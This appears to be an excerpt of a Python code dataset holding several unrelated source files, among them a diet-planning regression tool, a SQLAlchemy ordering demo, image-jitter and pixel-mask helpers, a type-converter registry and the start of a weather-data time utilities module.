id
stringlengths 1
8
| text
stringlengths 6
1.05M
| dataset_id
stringclasses 1
value |
---|---|---|
6495548
|
import codecs
import copy
import pickle
import numpy as np
import console
import constants
import regression
np.random.seed(11)
# This is to pickle all foods in sorted order
def pickle_top_foods_for_each_nutrient(pickle_all_foods=True):
    """Rank foods by each nutrient and pickle the ranking.

    Builds a dict mapping each 1-based nutrient index to a tuple of
    ('<nutrient description>_TopFoods', [food ids as strings, best first])
    and pickles it to disk.

    Args:
        pickle_all_foods (bool): If True, rank every food found in
            constants.NUTRIENT_DETAILS_FILE and write the result to
            constants.TOP_ALL_FOODS_PER_NUTRIENT_FILE; otherwise only
            foods listed in constants.SELECTED_FOOD_IDS are ranked and
            the result goes to constants.TOP_SELECTED_FOODS_PER_NUTRIENT_FILE.
    """
    with open(constants.NUTRIENT_DETAILS_FILE, 'r', encoding='ISO-8859-1') \
            as nutrient_data_file:
        # Skip the header row; each remaining row is '^'-separated.
        nutrient_data = nutrient_data_file.read().split('\n')[1:]
    if not pickle_all_foods:
        nutrient_data = [x for x in nutrient_data if str(
            int(x.split('^')[0])) in constants.SELECTED_FOOD_IDS]
    nutrient_data = [x.split("^") for x in nutrient_data]
    with open(constants.NUTRIENT_DETAILS_FILE, 'r', encoding='ISO-8859-1') \
            as nutrient_data_file:
        # The header row holds the nutrient descriptions.
        mineral_desc = nutrient_data_file.read().split('\n')[0] \
            .split('^')[constants.NUTRIENT_START_INDEX:-1]
    nutrient_data = np.array(nutrient_data)
    # Keep the food id column plus the nutrient value columns only.
    nutrient_data = np.concatenate(
        (
            nutrient_data[:, 0:1],
            nutrient_data[:, constants.NUTRIENT_START_INDEX:-1]
        ),
        axis=1
    )
    nutrient_data[nutrient_data == ''] = '0'
    nutrient_data = nutrient_data.astype("float")
    # Build the mapping directly; the original assembled Python source
    # text from the data and eval()'d it, which was fragile and unsafe.
    nutrient_wise_top_foods = {}
    for i in range(1, 150):
        # Sort rows by nutrient column i, highest value first.
        temp = nutrient_data[nutrient_data[:, i].argsort()[::-1]]
        # Ids end up as float strings (e.g. '1001.0'), matching what the
        # original eval-built dict contained.
        food_ids = temp[:, 0].astype('str').tolist()
        nutrient_wise_top_foods[i] = (
            mineral_desc[i - 1] + '_TopFoods', food_ids)
    if pickle_all_foods:
        with open(constants.TOP_ALL_FOODS_PER_NUTRIENT_FILE,
                  'wb') as pickle_file:
            pickle.dump(nutrient_wise_top_foods, pickle_file)
    else:
        with open(constants.TOP_SELECTED_FOODS_PER_NUTRIENT_FILE,
                  'wb') as pickle_file:
            pickle.dump(nutrient_wise_top_foods, pickle_file)
def build_x_and_y(input_food_list, duplicate_sample_count, daily_limit_list,
                  req_mineral_list):
    """Build the feature tensor X and target matrix Y for regression.

    Args:
        input_food_list (list): selected food ids (strings, no leading zeros).
        duplicate_sample_count (int): number of scaled copies of the sample
            to generate (multiplier z runs from 1 to this value).
        daily_limit_list (list): daily required amount per nutrient.
        req_mineral_list (list): 0-based nutrient indices to include.

    Returns:
        tuple: (x, y, normalize_list) where x has shape
        (duplicate_sample_count, len(input_food_list), len(req_mineral_list)).
    """
    # Scale each nutrient limit towards the mean so no single nutrient
    # dominates the regression; non-positive limits keep a factor of 1.
    avg = sum(daily_limit_list) / len(daily_limit_list)
    normalize_list = [avg / limit if limit > 0 else 1
                      for limit in daily_limit_list]
    daily_limit_list = [factor * limit for factor, limit
                        in zip(normalize_list, daily_limit_list)]
    with codecs.open(constants.NUTRIENT_DETAILS_FILE, 'r', encoding='utf-8',
                     errors='ignore') as data:
        food_items = data.read().split('\n')[1:]
    food_items = [food_item.split("^") for food_item in food_items]
    # Map food id (without leading zeros) -> full '^'-split record.
    # (A dict comprehension replaces the original list comprehension
    # that was used only for its update() side effects.)
    food_dict = {str(int(food_item[0])): food_item
                 for food_item in food_items}
    # x[z-1][f][m] = z * amount of mineral m in food f, scaled to
    # constants.GRAMS grams (source data is per 100 g).
    x = np.array(
        [[[z * float(food_dict[food_id][col]) * float(constants.GRAMS) / 100
           for col in [m + constants.NUTRIENT_START_INDEX
                       for m in req_mineral_list]]
          for food_id in input_food_list]
         for z in range(1, duplicate_sample_count + 1)])
    x = x * normalize_list
    # y[z-1] = normalized daily limits scaled by the sample multiplier.
    y = np.array([[limit * m for limit in daily_limit_list]
                  for m in range(1, duplicate_sample_count + 1)])
    return x, y, normalize_list
def get_top_foods_for_nutrient(all_foods, index, length):
    """Return the top foods for one nutrient from the pickled rankings.

    Args:
        all_foods (bool): If True read the all-foods ranking, otherwise
            the selected-foods ranking.
        index (int): 0-based nutrient index (the pickle keys are 1-based).
        length (int): number of foods wanted; note the slice is
            [:length + 1], so length + 1 entries come back (preserved
            from the original behaviour).

    Returns:
        tuple: (nutrient label, [food ids as plain integer strings]).
    """
    if all_foods:
        path = constants.TOP_ALL_FOODS_PER_NUTRIENT_FILE
    else:
        path = constants.TOP_SELECTED_FOODS_PER_NUTRIENT_FILE
    # Use a context manager so the pickle file handle is closed; the
    # original leaked the handle returned by open().
    with open(path, 'rb') as pickle_file:
        nutrient_wise_top_foods = pickle.load(pickle_file)
    return (
        nutrient_wise_top_foods[index + 1][0],
        [
            # Ids were pickled as float strings like '1001.0'.
            str(int(float(x)))
            for x in nutrient_wise_top_foods[index + 1][1][:length + 1]
        ]
    )
def get_add_more_list(x, y, theta):
    """Return names of nutrients whose computed total falls well short of
    the requirement (ratio required/computed > 2, or shortfall > 50)."""
    dt_product = regression.dot_product(x, theta)
    ratios = (y / dt_product).tolist()[0]
    differences = (y - dt_product).tolist()[0]
    deficient = [
        idx
        for idx, (ratio, diff) in enumerate(zip(ratios, differences))
        if ratio > 2 or diff > 50
    ]
    return [constants.REQUIRED_NUTRIENT_LIST[idx] for idx in deficient]
def get_remove_existing_foods_list(x, y, theta):
    """Return names of nutrients whose computed total far exceeds the
    requirement (ratio required/computed < 0.5, or excess > 50)."""
    dt_product = regression.dot_product(x, theta)
    ratios = (y / dt_product).tolist()[0]
    differences = (y - dt_product).tolist()[0]
    excessive = [
        idx
        for idx, (ratio, diff) in enumerate(zip(ratios, differences))
        if ratio < 0.5 or diff < (-50)
    ]
    return [constants.REQUIRED_NUTRIENT_LIST[idx] for idx in excessive]
def show_add_more_foods(nutrient_top_foods_dict, final_foods):
    """Interactive menu: let the user add foods for deficient nutrients.

    Args:
        nutrient_top_foods_dict (dict): menu index -> (nutrient label,
            [display names chosen so far], {option number: 'id^name'}).
        final_foods (list): selected food ids; appended to in place.

    Returns:
        list: final_foods including any newly chosen food ids.
    """
    loop = True
    while loop:
        loop_1 = True
        print("Added extra Foods for todays Meal:")
        # Show each nutrient with the display names already chosen for it.
        for i in nutrient_top_foods_dict.keys():
            print('\t' + nutrient_top_foods_dict[i][0] + ' : ' + ', '.join(
                nutrient_top_foods_dict[i][1]))
        print(
            "\nselect nutrients that you need to add, "
            "Please enter the number associated with nutrient"
        )
        for i in nutrient_top_foods_dict.keys():
            print('\t' + str(i) + " for " + nutrient_top_foods_dict[i][0])
        print("\t# to exit application")
        try:
            # Entering '#' (or any non-numeric input) raises and ends the
            # outer loop via the except branch below.
            nutrient_key = int(input())
            if nutrient_key in nutrient_top_foods_dict.keys():
                while loop_1:
                    console.show_products(nutrient_top_foods_dict[nutrient_key]
                                          [2])
                    food_list = nutrient_top_foods_dict[nutrient_key][2]
                    food_key = int(input())
                    if food_key in range(1, len(food_list) + 1):
                        # Record a display name (comma-free, max 25 chars)
                        # and, separately, the raw food id.
                        nutrient_top_foods_dict[nutrient_key][1].append(
                            nutrient_top_foods_dict[nutrient_key][2][
                                food_key].split('^')[1].replace(',', '')[:25])
                        final_foods.append(
                            nutrient_top_foods_dict[nutrient_key][2][
                                food_key].split('^')[0])
                    else:
                        # Out-of-range choice leaves the inner food menu.
                        loop_1 = False
        except Exception as e:
            # NOTE(review): this broad except also swallows unexpected
            # errors from console.show_products — confirm that is intended
            # (the sibling show_delete_foods catches only ValueError).
            loop = False
            print(
                "You chose to exit or gave wrong Input, "
                "Thank you for using this Application"
                + str(e)
            )
    return final_foods
def show_delete_foods(nutrient_top_foods_dict, final_foods):
    """Interactive menu: let the user pick foods to remove.

    Despite the name, this only *collects* the chosen food ids into
    final_foods (the caller passes an empty list and performs the actual
    removal itself).

    Args:
        nutrient_top_foods_dict (dict): menu index -> (nutrient label,
            [display names picked so far], {option number: 'id^name'}).
        final_foods (list): accumulator for chosen food ids.

    Returns:
        list: de-duplicated list of chosen food ids.
    """
    loop = True
    while loop:
        loop_1 = True
        print("Foods That need to be removed:")
        print(final_foods)
        # Show each nutrient with the display names already picked for it.
        for i in nutrient_top_foods_dict.keys():
            print('\t' + nutrient_top_foods_dict[i][0] + ' : ' + ', '.join(
                nutrient_top_foods_dict[i][1]))
        print(
            "\nselect nutrients that you need to remove, "
            "Please enter the number associated with nutrient"
        )
        for i in nutrient_top_foods_dict.keys():
            print('\t' + str(i) + " for " + nutrient_top_foods_dict[i][0])
        print("\t# to exit application")
        try:
            # Entering '#' (or any non-numeric input) raises ValueError,
            # which ends the outer loop below.
            nutrient_key = int(input())
            if nutrient_key in nutrient_top_foods_dict.keys():
                while loop_1:
                    console.show_products(
                        nutrient_top_foods_dict[nutrient_key][2]
                    )
                    food_list = nutrient_top_foods_dict[nutrient_key][2]
                    food_key = int(input())
                    if food_key in range(1, len(food_list) + 1):
                        # Record a display name (comma-free, max 25 chars)
                        # and, separately, the raw food id.
                        nutrient_top_foods_dict[nutrient_key][1].append(
                            nutrient_top_foods_dict[nutrient_key][2][
                                food_key].split('^')[1].replace(',', '')[:25])
                        final_foods.append(
                            nutrient_top_foods_dict[nutrient_key][2][
                                food_key].split('^')[0])
                    else:
                        # Out-of-range choice leaves the inner food menu.
                        loop_1 = False
        except ValueError:
            loop = False
            print(
                "You chose to exit or gave wrong Input, "
                "Thank you for using this Application"
            )
    # set() drops duplicates; note the order of the result is unspecified.
    return list(set(final_foods))
def add_more_foods(add_more_list, final_foods):
    """Interactively let the user add top foods for deficient nutrients.

    Args:
        add_more_list (list): indices of nutrients that need more foods.
        final_foods (list): currently selected food ids (strings).

    Returns:
        list: final_foods extended with the user's selections.
    """
    nutrient_top_foods_dict = {}
    with open(constants.NUTRIENT_DETAILS_FILE, 'r',
              encoding='ISO-8859-1') as nutrient_details_file:
        food_items = nutrient_details_file.read().split('\n')[1:]
    food_items = [food_item.split("^") for food_item in food_items]
    # Map food id (without leading zeros) -> full record; a dict
    # comprehension replaces the original side-effect list comprehension.
    food_dict = {str(int(food_item[0])): food_item
                 for food_item in food_items}
    for i in range(len(add_more_list)):
        # Top foods for this nutrient that are not already selected.
        top_list = [
            x for
            x in get_top_foods_for_nutrient(False, add_more_list[i], 50)[1]
            if x not in final_foods
        ]
        # Menu: 1-based option number -> 'food_id^food_name'. The
        # comprehension variable is j (the original reused i, shadowing
        # the loop variable).
        dictt = {j: top_list[j - 1] + '^' + food_dict[top_list[j - 1]][4]
                 for j in range(1, len(top_list) + 1)}
        nutrient_top_foods_dict.update(
            {i + 1: (constants.NUTRIENT_LIST[add_more_list[i]], [], dictt)})
    final_foods = show_add_more_foods(nutrient_top_foods_dict, final_foods)
    return final_foods
def removeExistingFoods(remove_existing_list, final_foods):
    """Interactively let the user pick foods to remove for nutrients that
    are in excess.

    Name kept as-is (not snake_case) for caller compatibility.

    Args:
        remove_existing_list (list): indices of nutrients in excess.
        final_foods (list): currently selected food ids (strings).

    Returns:
        list: food ids the user chose to remove.
    """
    nutrient_top_foods_dict = {}
    with open(constants.NUTRIENT_DETAILS_FILE, 'r',
              encoding='ISO-8859-1') as nutrient_details_file:
        food_items = nutrient_details_file.read().split('\n')[1:]
    food_items = [food_item.split("^") for food_item in food_items]
    # Map food id (without leading zeros) -> full record; a dict
    # comprehension replaces the original side-effect list comprehension.
    food_dict = {str(int(food_item[0])): food_item
                 for food_item in food_items}
    for i in range(len(remove_existing_list)):
        # Only foods that are currently selected are candidates.
        top_list = [
            x
            for x in get_top_foods_for_nutrient(
                False,
                remove_existing_list[i], 300
            )[1]
            if x in final_foods
        ]
        # Menu: 1-based option number -> 'food_id^food_name'.
        dictt = {j: top_list[j - 1] + '^' + food_dict[top_list[j - 1]][4]
                 for j in range(1, len(top_list) + 1)}
        nutrient_top_foods_dict.update({i + 1: (
            constants.NUTRIENT_LIST[remove_existing_list[i]], [], dictt)})
    remove_foods = show_delete_foods(nutrient_top_foods_dict, [])
    return remove_foods
def add_or_remove_foods(x, y, theta, final_foods):
    """Interactive dispatcher for editing the current food selection.

    Presents a numbered menu and, depending on the option chosen,
    adds/removes foods (manually or from analysis), drops zero-weight
    foods, or sets an iteration count for the next regression run.

    Args:
        x (numpy.ndarray): feature tensor; x.shape[2] is the nutrient count.
        y (numpy.ndarray): target matrix of daily limits.
        theta (numpy.ndarray): regression weights, one row per food.
        final_foods (list): currently selected food ids.

    Returns:
        tuple or None: (final_foods, theta, iterations) on success;
        None when there was nothing to change for the chosen option.
    """
    print(
        "Please analyse the output in " + constants.OUTPUT_FILE
        + "\n"
        + "Select one of the below items"
        + "\n\n\t"
        + "1 For Adding a Food yourself"
        + "\n\t"
        + "2 for Adding system analysed Foods"
        + "\n\t"
        + "3 for Removing a food item"
        + "\n\t"
        + "4 for Removing system analysed Foods"
        + "\n\t"
        + "5 for removing Zero weight foods"
        + "\n\t"
        + "6 for Running with specific Iterations"
        + "\n\t"
        + "# To Continue with previous items"
    )
    try:
        # '#' (or any non-numeric input) raises and is handled below.
        option = int(input())
        if option == 1:
            print(
                "Enter the comma separated food item IDs "
                "that needed to be added. "
                "for example\n\t11080,11215"
            )
            new_foods = [
                x.strip()
                for x in input().strip().split(',')
                if x not in final_foods
            ]
            if len(new_foods) > 0:
                # New foods get random initial weights, one row per food.
                append_theta = np.array(
                    [[i] * x.shape[2] for i in np.random.rand(len(new_foods))]
                )
                theta = np.concatenate((theta, append_theta), axis=0)
                final_foods = final_foods + new_foods
                return final_foods, theta, 0
            else:
                print("No food item to add")
                return None
        elif option == 2:
            if get_add_more_list(x, y, theta):
                initial_copy = copy.deepcopy(final_foods)
                final_foods = add_more_foods(get_add_more_list(x, y, theta),
                                             final_foods)
                if len(final_foods) - len(initial_copy) > 0:
                    # One random weight row per newly added food.
                    append_theta = np.array(
                        [
                            [i] * x.shape[2]
                            for i in
                            np.random.rand(len(final_foods)
                                           - len(initial_copy))
                        ]
                    )
                    theta = np.concatenate((theta, append_theta), axis=0)
                return final_foods, theta, 0
            else:
                print("No food items to Add based on Analysis")
                return None
        elif option == 3:
            print(
                "Enter the comma separated food "
                "item IDs that needed to be deleted."
                "for example\n\t11080,11215"
            )
            remove_foods = list(
                set(
                    [x.strip() for x in str(input()).strip().split(',') if
                     x in final_foods]
                )
            )
            if len(remove_foods) > 0:
                for food in remove_foods:
                    # Drop the food and its matching weight row.
                    indx = final_foods.index(food)
                    final_foods.remove(food)
                    theta = np.delete(theta, indx, axis=0)
                return final_foods, theta, 0
            else:
                print("No food items to delete")
                return None
        elif option == 4:
            if get_remove_existing_foods_list(x, y, theta):
                remove_foods = removeExistingFoods(
                    get_remove_existing_foods_list(x, y, theta),
                    final_foods
                )
                if len(remove_foods) > 0:
                    for food in remove_foods:
                        indx = final_foods.index(food)
                        final_foods.remove(food)
                        theta = np.delete(theta, indx, axis=0)
                return final_foods, theta, 0
            else:
                print("No food items to delete based on Analysis")
                return None
        elif option == 5:
            # Repeatedly remove foods whose first weight is exactly zero;
            # the exception from index() ends the loop when none remain.
            while True:
                theta_list = theta[:, 0].tolist()
                try:
                    indx = theta_list.index(0.0)
                    food = final_foods[indx]
                    final_foods.remove(food)
                    theta = np.delete(theta, indx, axis=0)
                except Exception as e:
                    print("Exception" + str(e))
                    break
            return final_foods, theta, 0
        elif option == 6:
            # Typo fixed: "reqired" -> "required".
            print("Enter the required iterations")
            iters = int(input())
            if iters > 0:
                return final_foods, theta, iters
            else:
                return final_foods, theta, 0
        else:
            # Typo fixed: "suing" -> "using".
            print("Invalid option. Thanks for using this Application.")
            return None
    except Exception as e:
        print(
            "You chose to exit or gave wrong Input, "
            "Thank you for using this Application\nThe exception is \n"
            + str(e)
        )
        return final_foods, theta, 0
|
StarcoderdataPython
|
6700735
|
<gh_stars>0
from sqlalchemy import create_engine, Column, Integer, String, ForeignKey, DATETIME
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, relationship, backref
from datetime import datetime
import time
# TODO: db_uri
# Connection string format:
# dialect+driver://username:password@host:port/database?charset=utf8
# NOTE(review): credentials are hard-coded here; consider moving them to
# configuration or environment variables.
DB_URI = 'mysql+pymysql://root:[email protected]:3300/first_sqlalchemy?charset=utf8'
engine = create_engine(DB_URI)
# Bind the declarative base's metadata to this engine.
Base = declarative_base(bind=engine)
# A Session instance is created immediately from the factory.
session = sessionmaker(bind=engine)()
# TODO: define the User model
class User(Base):
    """ORM model for the 'user' table."""
    __tablename__ = 'user'
    id = Column(Integer, primary_key=True, autoincrement=True)
    name = Column(String(50), nullable=False)
    # Creation timestamp defaults to the insert time (datetime.now).
    create_time = Column(DATETIME, nullable=False, default=datetime.now)
    def __repr__(self):
        return '<User(id={id}, name={name}, create_time={create_time})>'.format(id=self.id, name=self.name,
                                                                                create_time=self.create_time)
# TODO: define the Article model
class Article(Base):
    """ORM model for the 'article' table; each article belongs to a User
    via the 'uid' foreign key and the 'authors' relationship."""
    __tablename__ = 'article'
    id = Column(Integer, primary_key=True, autoincrement=True)
    title = Column(String(50), nullable=False)
    # Creation timestamp defaults to the insert time (datetime.now).
    create_time = Column(DATETIME, nullable=False, default=datetime.now)
    uid = Column(Integer, ForeignKey('user.id'))
    # TODO: relationship order_by parameter on the model: ascending
    # authors = relationship('User', backref=backref('articles', order_by=create_time))
    # TODO: relationship order_by parameter on the model: descending
    # authors = relationship('User', backref=backref('articles', order_by=create_time.desc()))
    authors = relationship('User', backref=backref('articles'))
    # TODO: 3. __mapper_args__ on the model: ascending
    # __mapper_args__ = {
    #     'order_by': create_time
    # }
    # TODO: 3. __mapper_args__ on the model: descending
    # NOTE(review): mapper-level 'order_by' is deprecated in SQLAlchemy 1.1
    # and removed in later releases — confirm the installed version.
    __mapper_args__ = {
        'order_by': create_time.desc()
    }
    def __repr__(self):
        return '<Article(id=%s, title=%s, create_time=%s)>' % (self.id, self.title, self.create_time)
# TODO: drop the data tables
# Base.metadata.drop_all()
# TODO: create the data tables
# Base.metadata.create_all()
# TODO: insert sample data
# user = User(name='zhiliao')
# article1 = Article(title='python')
# user.articles.append(article1)
# session.add(user)
# session.commit()
#
# time.sleep(2)
#
# article2 = Article(title='flask')
# user.articles.append(article2)
# session.add(user)
# session.commit()
#
# time.sleep(2)
#
# article3 = Article(title='django')
# user.articles.append(article3)
# session.add(user)
# session.commit()
# TODO: 1.order_by
# TODO: 1.1 ascending order
# articles = session.query(Article).order_by(Article.create_time).all()
# articles = session.query(Article).order_by('create_time').all()
# print(articles)
# TODO: 1.2 descending order
# articles = session.query(Article).order_by(Article.create_time.desc()).all()
# articles = session.query(Article).order_by('-create_time').all()
# print(articles)
# TODO: 2. relationship order_by parameter defined on the model
# TODO: 2.1 ascending order
# TODO: 2.2 descending order
# TODO: 3. __mapper_args__ defined on the model
# TODO: 3.1 ascending order
# TODO: 3.2 descending order
# NOTE: despite the plural name, first() returns a single User (or None).
users = session.query(User).first()
# Articles come back ordered per Article.__mapper_args__ (create_time desc).
print(users.articles)
|
StarcoderdataPython
|
6492641
|
<reponame>NateThom/contrastive_learning
import torch
import torchvision.transforms.functional as TF
import torchvision.transforms as T
class MyRandomColorJitter(object):
    """Randomly apply color jitter to the image(s) in a sample.

    Each of sample['image'] and (if present) sample['image2'] is
    independently passed through torchvision ColorJitter
    (brightness=0.8, contrast=0.8, saturation=0.8, hue=0.2) with
    probability 0.5.

    NOTE(review): the original docstring described a random crop and
    appears to have been copied from another transform.
    """
    def __init__(self):
        self.jitter = T.ColorJitter(0.8, 0.8, 0.8, 0.2)
    def __call__(self, sample):
        image = sample["image"]
        # One independent coin flip per image.
        jitter_probability = torch.rand(1)
        if jitter_probability[0] > 0.5:
            image = self.jitter(image)
        if "image2" in sample:
            image2 = sample["image2"]
            jitter_probability = torch.rand(1)
            if jitter_probability[0] > 0.5:
                image2 = self.jitter(image2)
            return {'image': image, 'image2': image2, 'label': sample['label']}
        return {'image': image, 'label': sample['label']}
|
StarcoderdataPython
|
5184818
|
<reponame>harshal306/radiometric_normalization
'''
Copyright 2015 Planet Labs, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import numpy
def pixel_list_to_array(pixel_locations, shape):
    ''' Transforms a list of pixel locations into a 2D array.

    :param tuple pixel_locations: A tuple of two lists representing the x and y
        coordinates of the locations of a set of pixels (i.e. the output of
        numpy.nonzero(valid_pixels) where valid_pixels is a 2D boolean array
        representing the pixel locations)
    :param tuple shape: The shape of the output array consisting of a tuple
        of (height, width)
    :returns: A 2-D boolean array with True at each listed pixel location
    '''
    # numpy.bool (an alias for the builtin) was deprecated in NumPy 1.20
    # and removed in 1.24; use the builtin bool for the dtype.
    mask = numpy.zeros(shape, dtype=bool)
    mask[pixel_locations] = True
    return mask
def trim_pixel_list(pixel_locations, active_pixels):
    ''' Trims the list of pixel locations to only the active pixels.

    :param tuple pixel_locations: A tuple of two lists representing the x and y
        coordinates of a set of pixel locations (i.e. the output of
        numpy.nonzero(valid_pixels))
    :param list active_pixels: A list the same length as the coordinate lists
        flagging whether each pixel location should be kept
    :returns: A tuple of two arrays with the x and y coordinates of the
        active pixels only
    '''
    keep = numpy.nonzero(active_pixels)[0]
    xs, ys = pixel_locations
    return (xs[keep], ys[keep])
def combine_valid_pixel_arrays(list_of_pixel_arrays):
    ''' Combines 2D boolean valid-pixel arrays, keeping only the pixels
    that are valid in every band.

    :param list list_of_pixel_arrays: 2D boolean arrays of valid pixel
        locations, one per band
    :returns: A 2D boolean array of the pixels common to all bands
    '''
    combined = numpy.logical_and.reduce(list_of_pixel_arrays)
    return combined
def combine_valid_pixel_lists(list_of_pixel_locations):
    ''' Combines lists of valid pixel x and y locations (for a 2D array),
    keeping only the pixels common to all bands.

    :param list list_of_pixel_locations: A list of tuples, each containing
        the x and y coordinate lists of one band's valid pixels (i.e. the
        output of numpy.nonzero(valid_pixels))
    :returns: A numpy.nonzero-style tuple of coordinate arrays for the
        pixels valid in every band
    '''
    # The intermediate mask must be big enough for the largest
    # coordinate seen in any band.
    max_x = max(max(locs[0]) for locs in list_of_pixel_locations)
    max_y = max(max(locs[1]) for locs in list_of_pixel_locations)
    shape = (max_x + 1, max_y + 1)
    masks = [pixel_list_to_array(locs, shape)
             for locs in list_of_pixel_locations]
    return numpy.nonzero(combine_valid_pixel_arrays(masks))
|
StarcoderdataPython
|
40784
|
"""doufo.convert
abstract class of `dataType` converters.
Example:
Todo:
Author:
"""
from .function import func
from functools import wraps, cmp_to_key
from multipledispatch import Dispatcher
from typing import Callable, TypeVar
__all__ = ['converters', 'convert_to', 'convert']
T = TypeVar('T')
B = TypeVar('B')
class ConvertersDict:
    """Registry of type-to-type converter functions.

    Converters are keyed by (source_type, target_type) tuples. The
    module-level instance ``converters`` below is the shared registry.
    """
    def __init__(self):
        """Start with an empty converter registry."""
        self.converters = {}
    def sorted_converters_keys(self):
        """Return the registry as a new dict whose keys are ordered by
        ``tuple_type_compare`` (subclass relations first, hashes as the
        final tiebreak)."""
        keys = sorted(self.converters.keys(),
                      key=cmp_to_key(tuple_type_compare))
        return {k: self.converters[k] for k in keys}
    def register(self, src: type, tar: type) -> Callable[[T], B]:
        """Decorator factory that registers a converter from `src` to `tar`.

        The registry is re-sorted after every registration.

        Args:
            src (type): source type
            tar (type): target type
        Returns:
            A decorator that stores its function in the registry and
            returns the function unchanged.
        """
        def deco(f):
            self.converters[(src, tar)] = f
            self.converters = self.sorted_converters_keys()
            return f
        return deco
    def convert(self, src: type, tar: type) -> Callable[[T], B]:
        """Look up the converter registered for (`src`, `tar`).

        Raises:
            KeyError: if no converter is registered for that pair.
        """
        return self.converters[(src, tar)]
# Shared module-level registry used by convert_to() / convert().
converters = ConvertersDict()
@func()
def convert_to(o, target_type):
    """Convert ``o`` to ``target_type`` via the registered converter.

    Args:
        o: any object for which a converter is registered
        target_type (type): destination type
    Returns:
        The converted object (of ``target_type``).
    Raises:
        KeyError: if no converter is registered for
            (type(o), target_type).
    """
    return converters.convert(type(o), target_type)(o)
@func()
def convert(o, target_type):
    """Convert ``o`` to ``target_type`` via the registered converter.

    NOTE(review): this body is currently identical to ``convert_to``.
    The original docstrings call one "forward" and the other
    "backwards", but both perform the same registry lookup — confirm
    whether one of them was meant to differ.

    Args:
        o: any object for which a converter is registered
        target_type (type): destination type
    Returns:
        The converted object (of ``target_type``).
    Raises:
        KeyError: if no converter is registered for
            (type(o), target_type).
    """
    return converters.convert(type(o), target_type)(o)
def tuple_type_compare(types0, types1):
    """Comparator ordering (src, tar) type pairs for the registry.

    Negative when ``types0`` sorts before ``types1``, positive for the
    reverse, 0 only when both pairs hold identical types. Subclass
    relations (via single_type_compare) take precedence, element 0
    first; otherwise the hash difference breaks the tie.
    """
    for position in (0, 1):
        outcome = single_type_compare(types0[position], types1[position])
        if outcome != 0:
            return outcome
    if types0[0] is types1[0] and types0[1] is types1[1]:
        return 0
    # Arbitrary-but-deterministic tiebreak for unrelated type pairs.
    return hash(types1) - hash(types0)
def single_type_compare(t0, t1):
    """Compare two types by subclass relationship.

    Returns 1 when t0 is a strict subclass of t1, -1 when t1 is a
    strict subclass of t0, and 0 when they are the same type or
    unrelated.
    """
    if t0 is t1:
        return 0
    if issubclass(t0, t1):
        return 1
    return -1 if issubclass(t1, t0) else 0
|
StarcoderdataPython
|
1953455
|
<filename>Conversor de bases numericas.py
# Simple interactive number-base converter: reads an integer and prints
# it in binary, octal or hexadecimal (all prompts are in Portuguese).
num = int(input('Informe um número para a conversão: '))
print('Digite 1 para BINÁRIO')
print('Digite 2 para OCTAL')
print('Digite 3 para HEXADECIMAL')
base = int(input('Escolha a base numérica: '))
# bin()/oct()/hex() return strings prefixed with 0b/0o/0x; [2:] strips
# the prefix so only the digits are shown.
if base == 1:
    print('{} em BINÁRIO é igual a {}'.format(num, bin(num)[2:]))
elif base == 2:
    print('{} em OCTAL é igual a {}'.format(num, oct(num)[2:]))
elif base == 3:
    print('{} em HEXADECIMAL é igual a {}'.format(num, hex(num)[2:]))
else:
    print('valor inválido!')
|
StarcoderdataPython
|
4955390
|
<filename>improver/utilities/temporal.py
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown Copyright 2017-2019 Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""General utilities for parsing and extracting cubes at times"""
import warnings
from datetime import datetime, timezone
import cf_units
import iris
import numpy as np
from iris import Constraint
from iris.time import PartialDateTime
def cycletime_to_datetime(cycletime, cycletime_format="%Y%m%dT%H%MZ"):
    """Parse a cycletime string into a datetime object.

    Args:
        cycletime (str):
            A cycletime string matching cycletime_format
            (default YYYYMMDDTHHMMZ).
        cycletime_format (str):
            The strptime format describing the cycletime string.

    Returns:
        datetime:
            The parsed datetime object.
    """
    parsed = datetime.strptime(cycletime, cycletime_format)
    return parsed
def datetime_to_cycletime(adatetime, cycletime_format="%Y%m%dT%H%MZ"):
    """Format a datetime object as a cycletime string.

    Args:
        adatetime (datetime.datetime):
            The datetime to render as a cycletime.
        cycletime_format (str):
            The strftime format to use (default YYYYMMDDTHHMMZ).

    Returns:
        str:
            The formatted cycletime string.
    """
    return adatetime.strftime(cycletime_format)
def cycletime_to_number(
    cycletime,
    cycletime_format="%Y%m%dT%H%MZ",
    time_unit="hours since 1970-01-01 00:00:00",
    calendar="gregorian",
):
    """Convert a cycletime string (YYYYMMDDTHHMMZ) to a numeric time value.

    Args:
        cycletime (str):
            A cycletime string that can be parsed using cycletime_format.
        cycletime_format (str):
            The strptime format describing the cycletime string.
        time_unit (str):
